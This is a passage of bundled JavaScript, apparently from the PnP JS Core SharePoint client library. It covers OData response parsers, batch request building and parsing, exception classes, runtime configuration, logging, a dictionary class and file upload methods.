exports.QueryableCollection = QueryableCollection; /** * Represents an instance that can be selected * */ var QueryableInstance = (function (_super) { __extends(QueryableInstance, _super); function QueryableInstance() { return _super !== null && _super.apply(this, arguments) || this; } /** * Choose which fields to return * * @param selects One or more fields to return */ QueryableInstance.prototype.select = function () { var selects = []; for (var _i = 0; _i < arguments.length; _i++) { selects[_i] = arguments[_i]; } if (selects.length > 0) { this._query.add("$select", selects.join(",")); } return this; }; /** * Expands fields such as lookups to get additional data * * @param expands The Fields for which to expand the values */ QueryableInstance.prototype.expand = function () { var expands = []; for (var _i = 0; _i < arguments.length; _i++) { expands[_i] = arguments[_i]; } if (expands.length > 0) { this._query.add("$expand", expands.join(",")); } return this; }; return QueryableInstance; }(Queryable)); exports.QueryableInstance = QueryableInstance; /***/ }), /* 2 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var logging_1 = __webpack_require__(5); var httpclient_1 = __webpack_require__(15); var pnplibconfig_1 = __webpack_require__(4); var exceptions_1 = __webpack_require__(3); var exceptions_2 = __webpack_require__(3); function extractOdataId(candidate) { if (candidate.hasOwnProperty("odata.id")) { return candidate["odata.id"]; } else if (candidate.hasOwnProperty("__metadata") && candidate.__metadata.hasOwnProperty("id")) { return candidate.__metadata.id; } else { throw new exceptions_1.ODataIdException(candidate); } } exports.extractOdataId = extractOdataId; var ODataParserBase = (function () { function ODataParserBase() { } ODataParserBase.prototype.parse = function (r) { var _this = this; return new Promise(function (resolve, reject) { if (_this.handleError(r, reject)) { if ((r.headers.has("Content-Length") && parseFloat(r.headers.get("Content-Length")) === 0) || r.status === 204) { resolve({}); } else { r.json().then(function (json) { return resolve(_this.parseODataJSON(json)); }).catch(function (e) { return reject(e); }); } } }); }; ODataParserBase.prototype.handleError = function (r, reject) { if (!r.ok) { r.json().then(function (json) { // include the headers as they contain diagnostic information var data = { responseBody: json, responseHeaders: r.headers, }; reject(new exceptions_2.ProcessHttpClientResponseException(r.status, r.statusText, data)); }).catch(function (e) { // we failed to read the body - possibly it is empty. Let's report the original status that caused // the request to fail and log the error with parsing the body if anyone needs it for debugging logging_1.Logger.log({ data: e, level: logging_1.LogLevel.Warning, message: "There was an error parsing the error response body. See data for details.", }); // include the headers as they contain diagnostic information var data = { responseBody: "[[body not available]]", responseHeaders: r.headers, }; reject(new exceptions_2.ProcessHttpClientResponseException(r.status, r.statusText, data)); }); } return r.ok; }; ODataParserBase.prototype.parseODataJSON = function (json) { var result = json; if (json.hasOwnProperty("d")) { if (json.d.hasOwnProperty("results")) { result = json.d.results; } else { result = json.d; } } else if (json.hasOwnProperty("value")) { result = json.value; } return result; }; return ODataParserBase; }()); exports.ODataParserBase = ODataParserBase; var ODataDefaultParser = (function (_super) { __extends(ODataDefaultParser, _super); function ODataDefaultParser() { return _super !== null && _super.apply(this, arguments) || this; } return ODataDefaultParser; }(ODataParserBase)); exports.ODataDefaultParser = ODataDefaultParser; var ODataRawParserImpl = (function () { function ODataRawParserImpl() { } ODataRawParserImpl.prototype.parse = function (r) { return r.json(); }; return ODataRawParserImpl; }()); exports.ODataRawParserImpl = ODataRawParserImpl; var ODataValueParserImpl = (function (_super) { __extends(ODataValueParserImpl, _super); function ODataValueParserImpl() { return _super !== null && _super.apply(this, arguments) || this; } ODataValueParserImpl.prototype.parse = function (r) { return _super.prototype.parse.call(this, r).then(function (d) { return d; }); }; return ODataValueParserImpl; }(ODataParserBase)); var ODataEntityParserImpl = (function (_super) { __extends(ODataEntityParserImpl, _super); function ODataEntityParserImpl(factory) { var _this = _super.call(this) || this; _this.factory = factory; return _this; } ODataEntityParserImpl.prototype.parse = function (r) { var _this = this; return _super.prototype.parse.call(this, r).then(function (d) { var o = new _this.factory(getEntityUrl(d), null); return util_1.Util.extend(o, d); }); }; return ODataEntityParserImpl; }(ODataParserBase)); var ODataEntityArrayParserImpl = (function (_super) { __extends(ODataEntityArrayParserImpl, _super); function ODataEntityArrayParserImpl(factory) { var _this = _super.call(this) || this; _this.factory = factory; return _this; } ODataEntityArrayParserImpl.prototype.parse = function (r) { var _this = this; return _super.prototype.parse.call(this, r).then(function (d) { return d.map(function (v) { var o = new _this.factory(getEntityUrl(v), null); return util_1.Util.extend(o, v); }); }); }; return ODataEntityArrayParserImpl; }(ODataParserBase)); function getEntityUrl(entity) { if (entity.hasOwnProperty("odata.editLink")) { // we are dealign with minimal metadata (default) return util_1.Util.combinePaths("_api", entity["odata.editLink"]); } else if (entity.hasOwnProperty("__metadata")) { // we are dealing with verbose, which has an absolute uri return entity.__metadata.uri; } else { // we are likely dealing with nometadata, so don't error but we won't be able to // chain off these objects logging_1.Logger.write("No uri information found in ODataEntity parsing, chaining will fail for this object.", logging_1.LogLevel.Warning); return ""; } } exports.getEntityUrl = getEntityUrl; exports.ODataRaw = new ODataRawParserImpl(); function ODataValue() { return new ODataValueParserImpl(); } exports.ODataValue = ODataValue; function ODataEntity(factory) { return new ODataEntityParserImpl(factory); } exports.ODataEntity = ODataEntity; function ODataEntityArray(factory) { return new ODataEntityArrayParserImpl(factory); } exports.ODataEntityArray = ODataEntityArray; /** * Manages a batch of OData operations */ var ODataBatch = (function () { function ODataBatch(baseUrl, _batchId) { if (_batchId === void 0) { _batchId = util_1.Util.getGUID(); } this.baseUrl = baseUrl; this._batchId = _batchId; this._requests = []; this._dependencies = []; } Object.defineProperty(ODataBatch.prototype, "batchId", { get: function () { return this._batchId; }, enumerable: true, configurable: true }); /** * Adds a request to a batch (not designed for public use) * * @param url The full url of the request * @param method The http method GET, POST, etc * @param options Any options to include in the request * @param parser The parser that will hadle the results of the request */ ODataBatch.prototype.add = function (url, method, options, parser) { var info = { method: method.toUpperCase(), options: options, parser: parser, reject: null, resolve: null, url: url, }; var p = new Promise(function (resolve, reject) { info.resolve = resolve; info.reject = reject; }); this._requests.push(info); return p; }; /** * Adds a dependency insuring that some set of actions will occur before a batch is processed. * MUST be cleared using the returned resolve delegate to allow batches to run */ ODataBatch.prototype.addDependency = function () { var resolver; var promise = new Promise(function (resolve) { resolver = resolve; }); this._dependencies.push(promise); return resolver; }; /** * Execute the current batch and resolve the associated promises * * @returns A promise which will be resolved once all of the batch's child promises have resolved */ ODataBatch.prototype.execute = function () { var _this = this; // we need to check the dependencies twice due to how different engines handle things. // We can get a second set of promises added after the first set resolve return Promise.all(this._dependencies).then(function () { return Promise.all(_this._dependencies); }).then(function () { return _this.executeImpl(); }); }; ODataBatch.prototype.executeImpl = function () { var _this = this; logging_1.Logger.write("[" + this.batchId + "] (" + (new Date()).getTime() + ") Executing batch with " + this._requests.length + " requests.", logging_1.LogLevel.Info); // if we don't have any requests, don't bother sending anything // this could be due to caching further upstream, or just an empty batch if (this._requests.length < 1) { logging_1.Logger.write("Resolving empty batch.", logging_1.LogLevel.Info); return Promise.resolve(); } // creating the client here allows the url to be populated for nodejs client as well as potentially // any other hacks needed for other types of clients. Essentially allows the absoluteRequestUrl // below to be correct var client = new httpclient_1.HttpClient(); // due to timing we need to get the absolute url here so we can use it for all the individual requests // and for sending the entire batch return util_1.Util.toAbsoluteUrl(this.baseUrl).then(function (absoluteRequestUrl) { // build all the requests, send them, pipe results in order to parsers var batchBody = []; var currentChangeSetId = ""; for (var i = 0; i < _this._requests.length; i++) { var reqInfo = _this._requests[i]; if (reqInfo.method === "GET") { if (currentChangeSetId.length > 0) { // end an existing change set batchBody.push("--changeset_" + currentChangeSetId + "--\n\n"); currentChangeSetId = ""; } batchBody.push("--batch_" + _this._batchId + "\n"); } else { if (currentChangeSetId.length < 1) { // start new change set currentChangeSetId = util_1.Util.getGUID(); batchBody.push("--batch_" + _this._batchId + "\n"); batchBody.push("Content-Type: multipart/mixed; boundary=\"changeset_" + currentChangeSetId + "\"\n\n"); } batchBody.push("--changeset_" + currentChangeSetId + "\n"); } // common batch part prefix batchBody.push("Content-Type: application/http\n"); batchBody.push("Content-Transfer-Encoding: binary\n\n"); var headers = { "Accept": "application/json;", }; // this is the url of the individual request within the batch var url = util_1.Util.isUrlAbsolute(reqInfo.url) ? reqInfo.url : util_1.Util.combinePaths(absoluteRequestUrl, reqInfo.url); logging_1.Logger.write("[" + _this.batchId + "] (" + (new Date()).getTime() + ") Adding request " + reqInfo.method + " " + url + " to batch.", logging_1.LogLevel.Verbose); if (reqInfo.method !== "GET") { var method = reqInfo.method; if (reqInfo.hasOwnProperty("options") && reqInfo.options.hasOwnProperty("headers") && typeof reqInfo.options.headers["X-HTTP-Method"] !== "undefined") { method = reqInfo.options.headers["X-HTTP-Method"]; delete reqInfo.options.headers["X-HTTP-Method"]; } batchBody.push(method + " " + url + " HTTP/1.1\n"); headers = util_1.Util.extend(headers, { "Content-Type": "application/json;odata=verbose;charset=utf-8" }); } else { batchBody.push(reqInfo.method + " " + url + " HTTP/1.1\n"); } if (typeof pnplibconfig_1.RuntimeConfig.headers !== "undefined") { headers = util_1.Util.extend(headers, pnplibconfig_1.RuntimeConfig.headers); } if (reqInfo.options && reqInfo.options.headers) { headers = util_1.Util.extend(headers, reqInfo.options.headers); } for (var name_1 in headers) { if (headers.hasOwnProperty(name_1)) { batchBody.push(name_1 + ": " + headers[name_1] + "\n"); } } batchBody.push("\n"); if (reqInfo.options.body) { batchBody.push(reqInfo.options.body + "\n\n"); } } if (currentChangeSetId.length > 0) { // Close the changeset batchBody.push("--changeset_" + currentChangeSetId + "--\n\n"); currentChangeSetId = ""; } batchBody.push("--batch_" + _this._batchId + "--\n"); var batchHeaders = { "Content-Type": "multipart/mixed; boundary=batch_" + _this._batchId, }; var batchOptions = { "body": batchBody.join(""), "headers": batchHeaders, }; logging_1.Logger.write("[" + _this.batchId + "] (" + (new Date()).getTime() + ") Sending batch request.", logging_1.LogLevel.Info); return client.post(util_1.Util.combinePaths(absoluteRequestUrl, "/_api/$batch"), batchOptions) .then(function (r) { return r.text(); }) .then(_this._parseResponse) .then(function (responses) { if (responses.length !== _this._requests.length) { throw new exceptions_1.BatchParseException("Could not properly parse responses to match requests in batch."); } logging_1.Logger.write("[" + _this.batchId + "] (" + (new Date()).getTime() + ") Resolving batched requests.", logging_1.LogLevel.Info); return responses.reduce(function (chain, response, index) { var request = _this._requests[index]; logging_1.Logger.write("[" + _this.batchId + "] (" + (new Date()).getTime() + ") Resolving batched request " + request.method + " " + request.url + ".", logging_1.LogLevel.Verbose); return chain.then(function (_) { return request.parser.parse(response).then(request.resolve).catch(request.reject); }); }, Promise.resolve()); }); }); }; /** * Parses the response from a batch request into an array of Response instances * * @param body Text body of the response from the batch request */ ODataBatch.prototype._parseResponse = function (body) { return new Promise(function (resolve, reject) { var responses = []; var header = "--batchresponse_"; // Ex. "HTTP/1.1 500 Internal Server Error" var statusRegExp = new RegExp("^HTTP/[0-9.]+ +([0-9]+) +(.*)", "i"); var lines = body.split("\n"); var state = "batch"; var status; var statusText; for (var i = 0; i < lines.length; ++i) { var line = lines[i]; switch (state) { case "batch": if (line.substr(0, header.length) === header) { state = "batchHeaders"; } else { if (line.trim() !== "") { throw new exceptions_1.BatchParseException("Invalid response, line " + i); } } break; case "batchHeaders": if (line.trim() === "") { state = "status"; } break; case "status": var parts = statusRegExp.exec(line); if (parts.length !== 3) { throw new exceptions_1.BatchParseException("Invalid status, line " + i); } status = parseInt(parts[1], 10); statusText = parts[2]; state = "statusHeaders"; break; case "statusHeaders": if (line.trim() === "") { state = "body"; } break; case "body": responses.push((status === 204) ? new Response() : new Response(line, { status: status, statusText: statusText })); state = "batch"; break; } } if (state !== "status") { reject(new exceptions_1.BatchParseException("Unexpected end of input")); } resolve(responses); }); }; return ODataBatch; }()); exports.ODataBatch = ODataBatch; var TextFileParser = (function () { function TextFileParser() { } TextFileParser.prototype.parse = function (r) { return r.text(); }; return TextFileParser; }()); exports.TextFileParser = TextFileParser; var BlobFileParser = (function () { function BlobFileParser() { } BlobFileParser.prototype.parse = function (r) { return r.blob(); }; return BlobFileParser; }()); exports.BlobFileParser = BlobFileParser; var JSONFileParser = (function () { function JSONFileParser() { } JSONFileParser.prototype.parse = function (r) { return r.json(); }; return JSONFileParser; }()); exports.JSONFileParser = JSONFileParser; var BufferFileParser = (function () { function BufferFileParser() { } BufferFileParser.prototype.parse = function (r) { if (util_1.Util.isFunction(r.arrayBuffer)) { return r.arrayBuffer(); } return r.buffer(); }; return BufferFileParser; }()); exports.BufferFileParser = BufferFileParser; /***/ }), /* 3 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var logging_1 = __webpack_require__(5); function defaultLog(error) { logging_1.Logger.log({ data: {}, level: logging_1.LogLevel.Error, message: "[" + error.name + "]::" + error.message }); } /** * Represents an exception with an HttpClient request * */ var ProcessHttpClientResponseException = (function (_super) { __extends(ProcessHttpClientResponseException, _super); function ProcessHttpClientResponseException(status, statusText, data) { var _this = _super.call(this, "Error making HttpClient request in queryable: [" + status + "] " + statusText) || this; _this.status = status; _this.statusText = statusText; _this.data = data; _this.name = "ProcessHttpClientResponseException"; logging_1.Logger.log({ data: _this.data, level: logging_1.LogLevel.Error, message: _this.message }); return _this; } return ProcessHttpClientResponseException; }(Error)); exports.ProcessHttpClientResponseException = ProcessHttpClientResponseException; var NoCacheAvailableException = (function (_super) { __extends(NoCacheAvailableException, _super); function NoCacheAvailableException(msg) { if (msg === void 0) { msg = "Cannot create a caching configuration provider since cache is not available."; } var _this = _super.call(this, msg) || this; _this.name = "NoCacheAvailableException"; defaultLog(_this); return _this; } return NoCacheAvailableException; }(Error)); exports.NoCacheAvailableException = NoCacheAvailableException; var APIUrlException = (function (_super) { __extends(APIUrlException, _super); function APIUrlException(msg) { if (msg === void 0) { msg = "Unable to determine API url."; } var _this = _super.call(this, msg) || this; _this.name = "APIUrlException"; defaultLog(_this); return _this; } return APIUrlException; }(Error)); exports.APIUrlException = APIUrlException; var AuthUrlException = (function (_super) { __extends(AuthUrlException, _super); function AuthUrlException(data, msg) { if (msg === void 0) { msg = "Auth URL Endpoint could not be determined from data. Data logged."; } var _this = _super.call(this, msg) || this; _this.name = "APIUrlException"; logging_1.Logger.log({ data: data, level: logging_1.LogLevel.Error, message: _this.message }); return _this; } return AuthUrlException; }(Error)); exports.AuthUrlException = AuthUrlException; var NodeFetchClientUnsupportedException = (function (_super) { __extends(NodeFetchClientUnsupportedException, _super); function NodeFetchClientUnsupportedException(msg) { if (msg === void 0) { msg = "Using NodeFetchClient in the browser is not supported."; } var _this = _super.call(this, msg) || this; _this.name = "NodeFetchClientUnsupportedException"; defaultLog(_this); return _this; } return NodeFetchClientUnsupportedException; }(Error)); exports.NodeFetchClientUnsupportedException = NodeFetchClientUnsupportedException; var SPRequestExecutorUndefinedException = (function (_super) { __extends(SPRequestExecutorUndefinedException, _super); function SPRequestExecutorUndefinedException() { var _this = this; var msg = [ "SP.RequestExecutor is undefined. ", "Load the SP.RequestExecutor.js library (/_layouts/15/SP.RequestExecutor.js) before loading the PnP JS Core library.", ].join(" "); _this = _super.call(this, msg) || this; _this.name = "SPRequestExecutorUndefinedException"; defaultLog(_this); return _this; } return SPRequestExecutorUndefinedException; }(Error)); exports.SPRequestExecutorUndefinedException = SPRequestExecutorUndefinedException; var MaxCommentLengthException = (function (_super) { __extends(MaxCommentLengthException, _super); function MaxCommentLengthException(msg) { if (msg === void 0) { msg = "The maximum comment length is 1023 characters."; } var _this = _super.call(this, msg) || this; _this.name = "MaxCommentLengthException"; defaultLog(_this); return _this; } return MaxCommentLengthException; }(Error)); exports.MaxCommentLengthException = MaxCommentLengthException; var NotSupportedInBatchException = (function (_super) { __extends(NotSupportedInBatchException, _super); function NotSupportedInBatchException(operation) { if (operation === void 0) { operation = "This operation"; } var _this = _super.call(this, operation + " is not supported as part of a batch.") || this; _this.name = "NotSupportedInBatchException"; defaultLog(_this); return _this; } return NotSupportedInBatchException; }(Error)); exports.NotSupportedInBatchException = NotSupportedInBatchException; var ODataIdException = (function (_super) { __extends(ODataIdException, _super); function ODataIdException(data, msg) { if (msg === void 0) { msg = "Could not extract odata id in object, you may be using nometadata. Object data logged to logger."; } var _this = _super.call(this, msg) || this; _this.name = "ODataIdException"; logging_1.Logger.log({ data: data, level: logging_1.LogLevel.Error, message: _this.message }); return _this; } return ODataIdException; }(Error)); exports.ODataIdException = ODataIdException; var BatchParseException = (function (_super) { __extends(BatchParseException, _super); function BatchParseException(msg) { var _this = _super.call(this, msg) || this; _this.name = "BatchParseException"; defaultLog(_this); return _this; } return BatchParseException; }(Error)); exports.BatchParseException = BatchParseException; var AlreadyInBatchException = (function (_super) { __extends(AlreadyInBatchException, _super); function AlreadyInBatchException(msg) { if (msg === void 0) { msg = "This query is already part of a batch."; } var _this = _super.call(this, msg) || this; _this.name = "AlreadyInBatchException"; defaultLog(_this); return _this; } return AlreadyInBatchException; }(Error)); exports.AlreadyInBatchException = AlreadyInBatchException; var FunctionExpectedException = (function (_super) { __extends(FunctionExpectedException, _super); function FunctionExpectedException(msg) { if (msg === void 0) { msg = "This query is already part of a batch."; } var _this = _super.call(this, msg) || this; _this.name = "FunctionExpectedException"; defaultLog(_this); return _this; } return FunctionExpectedException; }(Error)); exports.FunctionExpectedException = FunctionExpectedException; var UrlException = (function (_super) { __extends(UrlException, _super); function UrlException(msg) { var _this = _super.call(this, msg) || this; _this.name = "UrlException"; defaultLog(_this); return _this; } return UrlException; }(Error)); exports.UrlException = UrlException; /***/ }), /* 4 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var fetchclient_1 = __webpack_require__(21); var RuntimeConfigImpl = (function () { function RuntimeConfigImpl() { // these are our default values for the library this._headers = null; this._defaultCachingStore = "session"; this._defaultCachingTimeoutSeconds = 60; this._globalCacheDisable = false; this._fetchClientFactory = function () { return new fetchclient_1.FetchClient(); }; this._baseUrl = null; this._spfxContext = null; } RuntimeConfigImpl.prototype.set = function (config) { if (config.hasOwnProperty("headers")) { this._headers = config.headers; } if (config.hasOwnProperty("globalCacheDisable")) { this._globalCacheDisable = config.globalCacheDisable; } if (config.hasOwnProperty("defaultCachingStore")) { this._defaultCachingStore = config.defaultCachingStore; } if (config.hasOwnProperty("defaultCachingTimeoutSeconds")) { this._defaultCachingTimeoutSeconds = config.defaultCachingTimeoutSeconds; } if (config.hasOwnProperty("fetchClientFactory")) { this._fetchClientFactory = config.fetchClientFactory; } if (config.hasOwnProperty("baseUrl")) { this._baseUrl = config.baseUrl; } if (config.hasOwnProperty("spfxContext")) { this._spfxContext = config.spfxContext; } }; Object.defineProperty(RuntimeConfigImpl.prototype, "headers", { get: function () { return this._headers; }, enumerable: true, configurable: true }); Object.defineProperty(RuntimeConfigImpl.prototype, "defaultCachingStore", { get: function () { return this._defaultCachingStore; }, enumerable: true, configurable: true }); Object.defineProperty(RuntimeConfigImpl.prototype, "defaultCachingTimeoutSeconds", { get: function () { return this._defaultCachingTimeoutSeconds; }, enumerable: true, configurable: true }); Object.defineProperty(RuntimeConfigImpl.prototype, "globalCacheDisable", { get: function () { return this._globalCacheDisable; }, enumerable: true, configurable: true }); Object.defineProperty(RuntimeConfigImpl.prototype, "fetchClientFactory", { get: function () { return this._fetchClientFactory; }, enumerable: true, configurable: true }); Object.defineProperty(RuntimeConfigImpl.prototype, "baseUrl", { get: function () { if (this._baseUrl !== null) { return this._baseUrl; } else if (this._spfxContext !== null) { return this._spfxContext.pageContext.web.absoluteUrl; } return null; }, enumerable: true, configurable: true }); return RuntimeConfigImpl; }()); exports.RuntimeConfigImpl = RuntimeConfigImpl; var _runtimeConfig = new RuntimeConfigImpl(); exports.RuntimeConfig = _runtimeConfig; function setRuntimeConfig(config) { _runtimeConfig.set(config); } exports.setRuntimeConfig = setRuntimeConfig; /***/ }), /* 5 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); /** * A set of logging levels * */ var LogLevel; (function (LogLevel) { LogLevel[LogLevel["Verbose"] = 0] = "Verbose"; LogLevel[LogLevel["Info"] = 1] = "Info"; LogLevel[LogLevel["Warning"] = 2] = "Warning"; LogLevel[LogLevel["Error"] = 3] = "Error"; LogLevel[LogLevel["Off"] = 99] = "Off"; })(LogLevel = exports.LogLevel || (exports.LogLevel = {})); /** * Class used to subscribe ILogListener and log messages throughout an application * */ var Logger = (function () { function Logger() { } Object.defineProperty(Logger, "activeLogLevel", { get: function () { return Logger.instance.activeLogLevel; }, set: function (value) { Logger.instance.activeLogLevel = value; }, enumerable: true, configurable: true }); Object.defineProperty(Logger, "instance", { get: function () { if (typeof Logger._instance === "undefined" || Logger._instance === null) { Logger._instance = new LoggerImpl(); } return Logger._instance; }, enumerable: true, configurable: true }); /** * Adds ILogListener instances to the set of subscribed listeners * * @param listeners One or more listeners to subscribe to this log */ Logger.subscribe = function () { var listeners = []; for (var _i = 0; _i < arguments.length; _i++) { listeners[_i] = arguments[_i]; } listeners.map(function (listener) { return Logger.instance.subscribe(listener); }); }; /** * Clears the subscribers collection, returning the collection before modifiction */ Logger.clearSubscribers = function () { return Logger.instance.clearSubscribers(); }; Object.defineProperty(Logger, "count", { /** * Gets the current subscriber count */ get: function () { return Logger.instance.count; }, enumerable: true, configurable: true }); /** * Writes the supplied string to the subscribed listeners * * @param message The message to write * @param level [Optional] if supplied will be used as the level of the entry (Default: LogLevel.Verbose) */ Logger.write = function (message, level) { if (level === void 0) { level = LogLevel.Verbose; } Logger.instance.log({ level: level, message: message }); }; /** * Writes the supplied string to the subscribed listeners * * @param json The json object to stringify and write * @param level [Optional] if supplied will be used as the level of the entry (Default: LogLevel.Verbose) */ Logger.writeJSON = function (json, level) { if (level === void 0) { level = LogLevel.Verbose; } Logger.instance.log({ level: level, message: JSON.stringify(json) }); }; /** * Logs the supplied entry to the subscribed listeners * * @param entry The message to log */ Logger.log = function (entry) { Logger.instance.log(entry); }; /** * Logs performance tracking data for the the execution duration of the supplied function using console.profile * * @param name The name of this profile boundary * @param f The function to execute and track within this performance boundary */ Logger.measure = function (name, f) { return Logger.instance.measure(name, f); }; return Logger; }()); exports.Logger = Logger; var LoggerImpl = (function () { function LoggerImpl(activeLogLevel, subscribers) { if (activeLogLevel === void 0) { activeLogLevel = LogLevel.Warning; } if (subscribers === void 0) { subscribers = []; } this.activeLogLevel = activeLogLevel; this.subscribers = subscribers; } LoggerImpl.prototype.subscribe = function (listener) { this.subscribers.push(listener); }; LoggerImpl.prototype.clearSubscribers = function () { var s = this.subscribers.slice(0); this.subscribers.length = 0; return s; }; Object.defineProperty(LoggerImpl.prototype, "count", { get: function () { return this.subscribers.length; }, enumerable: true, configurable: true }); LoggerImpl.prototype.write = function (message, level) { if (level === void 0) { level = LogLevel.Verbose; } this.log({ level: level, message: message }); }; LoggerImpl.prototype.log = function (entry) { if (typeof entry === "undefined" || entry.level < this.activeLogLevel) { return; } this.subscribers.map(function (subscriber) { return subscriber.log(entry); }); }; LoggerImpl.prototype.measure = function (name, f) { console.profile(name); try { return f(); } finally { console.profileEnd(); } }; return LoggerImpl; }()); /** * Implementation of ILogListener which logs to the browser console * */ var ConsoleListener = (function () { function ConsoleListener() { } /** * Any associated data that a given logging listener may choose to log or ignore * * @param entry The information to be logged */ ConsoleListener.prototype.log = function (entry) { var msg = this.format(entry); switch (entry.level) { case LogLevel.Verbose: case LogLevel.Info: console.log(msg); break; case LogLevel.Warning: console.warn(msg); break; case LogLevel.Error: console.error(msg); break; } }; /** * Formats the message * * @param entry The information to format into a string */ ConsoleListener.prototype.format = function (entry) { return "Message: " + entry.message + " Data: " + JSON.stringify(entry.data); }; return ConsoleListener; }()); exports.ConsoleListener = ConsoleListener; /** * Implementation of ILogListener which logs to the supplied function * */ var FunctionListener = (function () { /** * Creates a new instance of the FunctionListener class * * @constructor * @param method The method to which any logging data will be passed */ function FunctionListener(method) { this.method = method; } /** * Any associated data that a given logging listener may choose to log or ignore * * @param entry The information to be logged */ FunctionListener.prototype.log = function (entry) { this.method(entry); }; return FunctionListener; }()); exports.FunctionListener = FunctionListener; /***/ }), /* 6 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); /** * Generic dictionary */ var Dictionary = (function () { /** * Creates a new instance of the Dictionary<T> class * * @constructor */ function Dictionary(keys, values) { if (keys === void 0) { keys = []; } if (values === void 0) { values = []; } this.keys = keys; this.values = values; } /** * Gets a value from the collection using the specified key * * @param key The key whose value we want to return, returns null if the key does not exist */ Dictionary.prototype.get = function (key) { var index = this.keys.indexOf(key); if (index < 0) { return null; } return this.values[index]; }; /** * Adds the supplied key and value to the dictionary * * @param key The key to add * @param o The value to add */ Dictionary.prototype.add = function (key, o) { var index = this.keys.indexOf(key); if (index > -1) { this.values[index] = o; } else { this.keys.push(key); this.values.push(o); } }; /** * Merges the supplied typed hash into this dictionary instance. Existing values are updated and new ones are created as appropriate. */ Dictionary.prototype.merge = function (source) { var _this = this; if ("getKeys" in source) { var sourceAsDictionary_1 = source; sourceAsDictionary_1.getKeys().map(function (key) { _this.add(key, sourceAsDictionary_1.get(key)); }); } else { var sourceAsHash = source; for (var key in sourceAsHash) { if (sourceAsHash.hasOwnProperty(key)) { this.add(key, sourceAsHash[key]); } } } }; /** * Removes a value from the dictionary * * @param key The key of the key/value pair to remove. Returns null if the key was not found. */ Dictionary.prototype.remove = function (key) { var index = this.keys.indexOf(key); if (index < 0) { return null; } var val = this.values[index]; this.keys.splice(index, 1); this.values.splice(index, 1); return val; }; /** * Returns all the keys currently in the dictionary as an array */ Dictionary.prototype.getKeys = function () { return this.keys; }; /** * Returns all the values currently in the dictionary as an array */ Dictionary.prototype.getValues = function () { return this.values; }; /** * Clears the current dictionary */ Dictionary.prototype.clear = function () { this.keys = []; this.values = []; }; /** * Gets a count of the items currently in the dictionary */ Dictionary.prototype.count = function () { return this.keys.length; }; return Dictionary; }()); exports.Dictionary = Dictionary; /***/ }), /* 7 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var odata_1 = __webpack_require__(2); var util_1 = __webpack_require__(0); var exceptions_1 = __webpack_require__(3); var webparts_1 = __webpack_require__(50); var items_1 = __webpack_require__(10); var queryableshareable_1 = __webpack_require__(12); var odata_2 = __webpack_require__(2); /** * Describes a collection of File objects * */ var Files = (function (_super) { __extends(Files, _super); /** * Creates a new instance of the Files class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Files(baseUrl, path) { if (path === void 0) { path = "files"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a File by filename * * @param name The name of the file, including extension. */ Files.prototype.getByName = function (name) { var f = new File(this); f.concat("('" + name + "')"); return f; }; /** * Uploads a file. Not supported for batching * * @param url The folder-relative url of the file. * @param content The file contents blob. * @param shouldOverWrite Should a file with the same name in the same location be overwritten? (default: true) * @returns The new File and the raw response. */ Files.prototype.add = function (url, content, shouldOverWrite) { var _this = this; if (shouldOverWrite === void 0) { shouldOverWrite = true; } return new Files(this, "add(overwrite=" + shouldOverWrite + ",url='" + url + "')") .post({ body: content, }).then(function (response) { return { data: response, file: _this.getByName(url), }; }); }; /** * Uploads a file. Not supported for batching * * @param url The folder-relative url of the file. * @param content The Blob file content to add * @param progress A callback function which can be used to track the progress of the upload * @param shouldOverWrite Should a file with the same name in the same location be overwritten? (default: true) * @param chunkSize The size of each file slice, in bytes (default: 10485760) * @returns The new File and the raw response. */ Files.prototype.addChunked = function (url, content, progress, shouldOverWrite, chunkSize) { var _this = this; if (shouldOverWrite === void 0) { shouldOverWrite = true; } if (chunkSize === void 0) { chunkSize = 10485760; } var adder = this.clone(Files, "add(overwrite=" + shouldOverWrite + ",url='" + url + "')"); return adder.post().then(function () { return _this.getByName(url); }).then(function (file) { return file.setContentChunked(content, progress, chunkSize); }).then(function (response) { return { data: response, file: _this.getByName(url), }; }); }; /** * Adds a ghosted file to an existing list or document library. Not supported for batching. * * @param fileUrl The server-relative url where you want to save the file. * @param templateFileType The type of use to create the file. * @returns The template file that was added and the raw response. */ Files.prototype.addTemplateFile = function (fileUrl, templateFileType) { var _this = this; return this.clone(Files, "addTemplateFile(urloffile='" + fileUrl + "',templatefiletype=" + templateFileType + ")") .post().then(function (response) { return { data: response, file: _this.getByName(fileUrl), }; }); }; return Files; }(queryable_1.QueryableCollection)); exports.Files = Files; /** * Describes a single File instance * */ var File = (function (_super) { __extends(File, _super); function File() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(File.prototype, "listItemAllFields", { /** * Gets a value that specifies the list item field values for the 